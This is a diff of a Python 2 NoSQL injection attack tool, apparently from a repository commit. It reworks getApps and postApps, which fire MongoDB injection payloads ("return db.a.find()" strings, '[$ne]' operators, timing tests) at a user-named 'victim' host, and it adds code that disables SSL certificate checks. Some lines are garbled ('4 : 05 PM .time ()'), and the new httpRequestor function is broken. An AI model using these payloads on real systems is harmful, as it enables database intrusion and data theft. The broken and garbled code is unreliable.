1- import httplib2
21import urllib
32import urllib2
4- import json
3+ import string
4+ import nsmmongo
5+ from sys import version_info
56import datetime
6- import itertools
7- import re
7+ import time
8+ import random
89
9- def getApps (victim ,webPort ,uri ,https ,verb ):
10+ def httpRequestor (httpReq ):
11+ #Need to determine version of Python that's running to figure out how to handle self-signed certs.
12+ if version_info () >= (2 ,7 ,9 ):
13+ import ssl
14+ ssl ._create_default_https_context = ssl ._create_unverified_context
15+
16+
17+
18+
19+
20+
21+ def getApps (webPort ,victim ,uri ,https ,verb ,requestHeaders ):
1022 print "Web App Attacks (GET)"
1123 print "==============="
1224 paramName = []
1325 global testNum
26+ global httpMethod
27+ httpMethod = "GET"
1428 testNum = 1
1529 paramValue = []
1630 global vulnAddrs
@@ -19,6 +33,8 @@ def getApps(victim,webPort,uri,https,verb):
1933 possAddrs = []
2034 timeVulnsStr = []
2135 timeVulnsInt = []
36+ yes_tag = ['y' , 'Y' ]
37+ no_tag = ['n' , 'N' ]
2238 appUp = False
2339 strTbAttack = False
2440 intTbAttack = False
@@ -30,7 +46,6 @@ def getApps(victim,webPort,uri,https,verb):
3046 str24 = False
3147 global int24
3248 int24 = False
33- global requestHeaders
3449
3550 #Verify app is working.
3651 print "Checking to see if site at " + str (victim ) + ":" + str (webPort ) + str (uri ) + " is up..."
@@ -107,7 +122,7 @@ def getApps(victim,webPort,uri,https,verb):
107122
108123 if errorCheck == False :
109124 injLen = int (len (urllib2 .urlopen (req ).read ()))
110- checkResult (randLength ,injLen ,testNum )
125+ checkResult (randLength ,injLen ,testNum , verb )
111126 testNum += 1
112127 else :
113128 testNum += 1
@@ -125,7 +140,7 @@ def getApps(victim,webPort,uri,https,verb):
125140
126141 if errorCheck == False :
127142 injLen = int (len (urllib2 .urlopen (req ).read ()))
128- checkResult (randLength ,injLen ,testNum )
143+ checkResult (randLength ,injLen ,testNum , verb )
129144 testNum += 1
130145
131146 else :
@@ -144,7 +159,7 @@ def getApps(victim,webPort,uri,https,verb):
144159
145160 if errorCheck == False :
146161 injLen = int (len (urllib2 .urlopen (req ).read ()))
147- checkResult (randLength ,injLen ,testNum )
162+ checkResult (randLength ,injLen ,testNum , verb )
148163 testNum += 1
149164
150165 else :
@@ -163,7 +178,7 @@ def getApps(victim,webPort,uri,https,verb):
163178
164179 if errorCheck == False :
165180 injLen = int (len (urllib2 .urlopen (req ).read ()))
166- checkResult (randLength ,injLen ,testNum )
181+ checkResult (randLength ,injLen ,testNum , verb )
167182 testNum += 1
168183 else :
169184 testNum += 1
@@ -180,7 +195,7 @@ def getApps(victim,webPort,uri,https,verb):
180195
181196 if errorCheck == False :
182197 injLen = int (len (urllib2 .urlopen (req ).read ()))
183- checkResult (randLength ,injLen ,testNum )
198+ checkResult (randLength ,injLen ,testNum , verb )
184199 testNum += 1
185200
186201 else :
@@ -198,7 +213,7 @@ def getApps(victim,webPort,uri,https,verb):
198213
199214 if errorCheck == False :
200215 injLen = int (len (urllib2 .urlopen (req ).read ()))
201- checkResult (randLength ,injLen ,testNum )
216+ checkResult (randLength ,injLen ,testNum , verb )
202217 testNum += 1
203218 else :
204219 testNum += 1
@@ -215,7 +230,7 @@ def getApps(victim,webPort,uri,https,verb):
215230
216231 if errorCheck == False :
217232 injLen = int (len (urllib2 .urlopen (req ).read ()))
218- checkResult (randLength ,injLen ,testNum )
233+ checkResult (randLength ,injLen ,testNum , verb )
219234 testNum += 1
220235 else :
221236 testNum += 1
@@ -233,18 +248,19 @@ def getApps(victim,webPort,uri,https,verb):
233248
234249 if errorCheck == False :
235250 injLen = int (len (urllib2 .urlopen (req ).read ()))
236- checkResult (randLength ,injLen ,testNum )
251+ checkResult (randLength ,injLen ,testNum , verb )
237252 testNum += 1
238253
254+
239255 doTimeAttack = raw_input ("Start timing based tests (y/n)? " )
240256
241257 if doTimeAttack in yes_tag :
242258 print "Starting Javascript string escape time based injection..."
243259 req = urllib2 .Request (uriArray [18 ], None , requestHeaders )
244- start = 4 : 05 PM .time ()
260+ start = time .time ()
245261 strTimeInj = urllib2 .urlopen (req )
246262 page = strTimeInj .read ()
247- end = 4 : 05 PM .time ()
263+ end = time .time ()
248264 strTimeInj .close ()
249265 #print str(end)
250266 #print str(start)
@@ -331,12 +347,14 @@ def getApps(victim,webPort,uri,https,verb):
331347 raw_input ("Press enter to continue..." )
332348 return ()
333349
334- def postApps ():
350+ def postApps (victim , webPort , uri , https , verb , postData , requestHeaders ):
335351 print "Web App Attacks (POST)"
336352 print "==============="
337353 paramName = []
338354 paramValue = []
339355 global vulnAddrs
356+ global httpMethod
357+ httpMethod = "POST"
340358 vulnAddrs = []
341359 global possAddrs
342360 possAddrs = []
@@ -347,10 +365,8 @@ def postApps():
347365 intTbAttack = False
348366 trueStr = False
349367 trueInt = False
350- global postData
351368 global neDict
352369 global gtDict
353- global requestHeaders
354370 testNum = 1
355371
356372 #Verify app is working.
@@ -447,7 +463,7 @@ def postApps():
447463
448464 if errorCheck == False :
449465 injLen = int (len (urllib2 .urlopen (req ).read ()))
450- checkResult (randLength ,injLen ,testNum )
466+ checkResult (randLength ,injLen ,testNum , verb )
451467 testNum += 1
452468
453469 else :
@@ -474,7 +490,7 @@ def postApps():
474490
475491 if errorCheck == False :
476492 injLen = int (len (urllib2 .urlopen (req ).read ()))
477- checkResult (randLength ,injLen ,testNum )
493+ checkResult (randLength ,injLen ,testNum , verb )
478494 testNum += 1
479495
480496 postData .update ({injOpt :"a'; return db.a.find(); var dummy='!" })
@@ -491,7 +507,7 @@ def postApps():
491507
492508 if errorCheck == False :
493509 injLen = int (len (urllib2 .urlopen (req ).read ()))
494- checkResult (randLength ,injLen ,testNum )
510+ checkResult (randLength ,injLen ,testNum , verb )
495511 testNum += 1
496512 else :
497513 testNum += 1
@@ -511,7 +527,7 @@ def postApps():
511527
512528 if errorCheck == False :
513529 injLen = int (len (urllib2 .urlopen (req ).read ()))
514- checkResult (randLength ,injLen ,testNum )
530+ checkResult (randLength ,injLen ,testNum , verb )
515531 testNum += 1
516532 else :
517533 testNum += 1
@@ -532,7 +548,7 @@ def postApps():
532548
533549 if errorCheck == False :
534550 injLen = int (len (urllib2 .urlopen (req ).read ()))
535- checkResult (randLength ,injLen ,testNum )
551+ checkResult (randLength ,injLen ,testNum , verb )
536552 testNum += 1
537553
538554 else :
@@ -553,7 +569,7 @@ def postApps():
553569
554570 if errorCheck == False :
555571 injLen = int (len (urllib2 .urlopen (req ).read ()))
556- checkResult (randLength ,injLen ,testNum )
572+ checkResult (randLength ,injLen ,testNum , verb )
557573 testNum += 1
558574
559575 else :
@@ -575,7 +591,7 @@ def postApps():
575591
576592 if errorCheck == False :
577593 injLen = int (len (urllib2 .urlopen (req ).read ()))
578- checkResult (randLength ,injLen ,testNum )
594+ checkResult (randLength ,injLen ,testNum , verb )
579595 testNum += 1
580596 print "\n "
581597 else :
@@ -595,7 +611,7 @@ def postApps():
595611
596612 if errorCheck == False :
597613 injLen = int (len (urllib2 .urlopen (req ).read ()))
598- checkResult (randLength ,injLen ,testNum )
614+ checkResult (randLength ,injLen ,testNum , verb )
599615 testNum += 1
600616
601617 else :
@@ -724,7 +740,7 @@ def errorTest (errorCheck,testNum):
724740
725741
726742
727- def checkResult (baseSize ,respSize ,testNum ):
743+ def checkResult (baseSize ,respSize ,testNum , verb ):
728744 global vulnAddrs
729745 global possAddrs
730746 global lt24
@@ -834,7 +850,7 @@ def buildUri(origUri, randValue):
834850 paramValue = []
835851 global uriArray
836852 uriArray = ["" ,"" ,"" ,"" ,"" ,"" ,"" ,"" ,"" ,"" ,"" ,"" ,"" ,"" ,"" ,"" ,"" ,"" ,"" ]
837- injOpt = ""
853+ injOpt = []
838854
839855 #Split the string between the path and parameters, and then split each parameter
840856 try :
@@ -857,11 +873,17 @@ def buildUri(origUri, randValue):
857873 menuItem += 1
858874
859875 try :
860- injIndex = raw_input ("Which parameter should we inject? " )
861- injOpt = str (paramName [int (injIndex )- 1 ])
862- print "Injecting the " + injOpt + " parameter..."
876+ injIndex = raw_input ("Enter parameters to inject in a comma separated list: " )
863877
864- except :
878+ for params in injIndex .split ("," ):
879+ injOpt .append (paramName [int (params )- 1 ])
880+
881+ #injOpt = str(paramName[int(injIndex)-1])
882+
883+ for params in injOpt :
884+ print "Injecting the " + params + " parameter..."
885+
886+ except Exception :
865887 raw_input ("Something went wrong. Press enter to return to the main menu..." )
866888 return
867889
@@ -887,7 +909,8 @@ def buildUri(origUri, randValue):
887909 uriArray [18 ] = split_uri [0 ] + "?"
888910
889911 for item in paramName :
890- if paramName [x ] == injOpt :
912+
913+ if paramName [x ] in injOpt :
891914 uriArray [0 ] += paramName [x ] + "=" + randValue + "&"
892915 uriArray [1 ] += paramName [x ] + "[$ne]=" + randValue + "&"
893916 uriArray [2 ] += paramName [x ] + "=a'; return db.a.find(); var dummy='!" + "&"
@@ -933,14 +956,15 @@ def buildUri(origUri, randValue):
933956
934957 #Clip the extra & off the end of the URL
935958 x = 0
936- while x <= 17 :
959+ while x <= 18 :
937960 uriArray [x ]= uriArray [x ][:- 1 ]
938961 x += 1
939962
940963 return uriArray [0 ]
941964
942965def getDBInfo ():
943966 curLen = 0
967+ yes_tag = ['y' , 'Y' ]
944968 nameLen = 0
945969 gotFullDb = False
946970 gotNameLen = False
0 commit comments